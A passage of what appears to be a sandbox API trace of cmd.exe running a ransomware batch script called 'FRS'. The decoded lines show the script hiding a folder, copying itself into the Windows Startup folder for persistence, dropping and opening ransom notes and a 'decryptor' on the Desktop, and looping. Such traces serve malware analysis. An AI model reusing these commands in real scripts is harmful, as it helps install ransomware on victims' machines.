hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0117.556] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.556] GetFileType (hFile=0x318) returned 0x1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0117.556] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0117.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0117.556] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0117.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.557] GetFileType (hFile=0x318) returned 0x1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0117.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0117.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0117.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.557] GetFileType (hFile=0x318) returned 0x1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0117.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0117.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0117.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.557] GetFileType (hFile=0x318) returned 0x1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0117.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0117.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0117.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.557] GetFileType (hFile=0x318) returned 0x1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0117.557] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0117.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0117.557] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.557] GetFileType (hFile=0x318) returned 0x1 [0117.557] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0117.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0117.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0117.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.558] GetFileType (hFile=0x318) returned 0x1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0117.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0117.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0117.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.558] GetFileType (hFile=0x318) returned 0x1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0117.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0117.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0117.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.558] GetFileType (hFile=0x318) returned 0x1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0117.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0117.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0117.558] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.558] GetFileType (hFile=0x318) returned 0x1 [0117.558] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0117.558] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0117.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0117.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.559] GetFileType (hFile=0x318) returned 0x1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0117.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0117.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0117.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.559] GetFileType (hFile=0x318) returned 0x1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0117.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0117.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0117.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.559] GetFileType (hFile=0x318) returned 0x1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0117.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0117.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0117.559] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.559] GetFileType (hFile=0x318) returned 0x1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0117.559] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0117.559] SetFilePointer (in: hFile=0x318, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0117.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0117.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.560] GetFileType (hFile=0x318) returned 0x1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0117.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0117.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0117.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.560] GetFileType (hFile=0x318) returned 0x1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0117.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0117.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0117.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.560] GetFileType (hFile=0x318) returned 0x1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0117.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0117.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0117.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.560] GetFileType (hFile=0x318) returned 0x1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0117.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0117.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0117.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0117.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.561] GetFileType (hFile=0x318) returned 0x1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0117.561] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0117.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0117.561] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.561] GetFileType (hFile=0x318) returned 0x1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0117.561] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0117.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0117.561] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.561] GetFileType (hFile=0x318) returned 0x1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0117.561] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0117.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0117.561] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.561] GetFileType (hFile=0x318) returned 0x1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0117.561] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0117.561] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0117.561] _get_osfhandle (_FileHandle=3) returned 0x318 [0117.561] GetFileType (hFile=0x318) returned 0x1 [0117.561] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0117.561] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0117.562] SetFilePointer (in: hFile=0x318, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0117.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0117.562] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0117.562] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.562] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0117.562] 